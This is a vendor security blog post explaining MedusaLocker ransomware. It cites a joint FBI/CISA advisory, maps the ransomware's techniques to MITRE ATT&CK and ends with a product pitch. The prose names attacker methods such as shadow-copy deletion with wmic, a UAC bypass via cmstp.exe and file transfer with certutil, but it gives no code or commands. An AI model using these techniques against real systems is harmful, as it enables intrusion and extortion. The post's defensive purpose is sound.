MedusaLocker Ransomware-As-A-Service (RAAS) Explained

What is MedusaLocker Ransomware?

MedusaLocker is a RaaS (Ransomware as a Service) variant that was first discovered in 2019 and has taken over the world. To increase the effectiveness of the encryption, MedusaLocker ransomware removes volume shadow copies and disables system services to encrypt data using AES-256 encryption.

The MedusaLocker ransomware is typical ransomware that encrypts its victim’s data and demands ransom for the decryption key. The MedusaLocker malware threat doesn’t seem to have resulted in any data exfiltration, though it does threaten victims with releasing sensitive data.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) has released a joint advisory stating that “MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to transfer ransomware payments to a specific Bitcoin wallet address.”

MedusaLocker Ransomware – Mitre Attack TTPs

MedusaLocker actors use the ATT&CK techniques listed in Table 1.

Initial Access
Technique Title	ID	Use
External Remote Services	T1133	MedusaLocker actors gained access to victim devices through vulnerable RDP configurations.
Phishing	T1566	MedusaLocker actors used phishing and spearphishing to obtain access to victims’ networks.
Valid Accounts	T1078	Threat actors use brute-force password guessing for RDP services. The revealed password allows the attacker to gain initial access to the victim’s network.
Execution
Technique Title	ID	Use
Command and Scripting Interpreter: PowerShell	T1059.001	MedusaLocker actors may abuse PowerShell commands and scripts for execution.
Windows Management Instrumentation	T1047	MedusaLocker uses Windows Management Instrumentation command-line utility (wmic) to delete volume shadow copies to prevent victims from recovering their encrypted data.
Persistence
Technique Title	ID	Use
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder	T1547	MedusaLocker establishes persistence and executes the ransomware at system startup by adding the following registry entry.
Privilege Escalation
Technique Title	ID	Use
Abuse Elevation Control Mechanism Bypass UAC	T1548.002	MedusaLocker ransomware uses the built-in Windows tool called Microsoft Connection Manager Profile Installer (cmstp.exe) to bypass User Account Control (UAC) and runs arbitrary commands with elevated privileges.
Valid Accounts	T1078	Threat actors use brute-force password guessing for RDP services. If the guessed password belongs to the domain administrator, they can execute commands with elevated privileges.
Defense Evasion
Technique Title	ID	Use
Impair Defenses: Disable or Modify Tools	T1562.001	MedusaLocker disables security products such as antivirus to avoid being detected.
Impair Defenses: Safe Mode Boot	T1562.009	MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services.
Credential Access
Technique Title	ID	Use
Brute Force	T1110	Threat actors use brute-force password guessing for RDP services.
Discovery
Technique Title	ID	Use
File and Directory Discovery	T1083	MedusaLocker searches for files and directories in the victim’s computer. After discovery, the ransomware starts to encrypt all files and directories
Network Share Discovery	T1135	MedusaLocker searches for shared files in the network. The shared files also indicate that there might be other hosts in the network that can be moved to laterally.
Query Registry	T1012	MedusaLocker searches the registry hive to learn about security products deployed in the victim’s network.
Lateral Movement
Technique Title	ID	Use
Remote Services	T1021	MedusaLocker ransomware uses remote services to infect other hosts in the victim’s network. Threat actors use RDP, PsExec, and SMB to spread the ransomware payload.
Command and Control
Technique Title	ID	Use
Ingress Tool Transfer	T1105	MedusaLocker uses certutil.exe to transfer files from its command and control server to the victim’s network.
Impact
Technique Title	ID	Use
Data Encrypted for Impact	T1486	MedusaLocker actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
Inhibit System Recovery	T1490	MedusaLocker actors may deny access to operating systems containing features that can help fix corrupted systems, such as backup catalog, volume shadow copies, and automatic repair.

Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise

How to Stop MedusaLocker Ransomware from Spreading?

You can stop MedusaLocker ransomware from spreading by isolating the infected devices from the rest of your network. Disconnecting the device will help stop the ransomware from encrypting files on other devices. Once devices are isolated, you can start scanning with antivirus software to remove the malware and any potential back doors that have been left behind.

How to Detect and Prevent MedusaLocker Ransomware Attack?

Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect cyber security threats using conventional tools and techniques. NetSecurity’s ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making it easy, fast, and hassle-free.

Want to try our ThreatResponder, cutting-edge Endpoint Detection & Response (EDR), and ThreatResponder FORENSICS, the Swiss knife for forensic investigators in action? Click on the below button to request a free demo of our NetSecurity’s ThreatResponder platform.

Start a Free Demo

Disclaimer

The page’s content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that the contents of this page are copyrighted by NETSECURITY CORPORATION. Any violation/misuse/unauthorized use of this content “as is” or “modified” shall be considered illegal and subjected to articles and provisions that have been stipulated in the General Data Protection Regulation (GDPR) and Personal Data Protection Law (PDPL).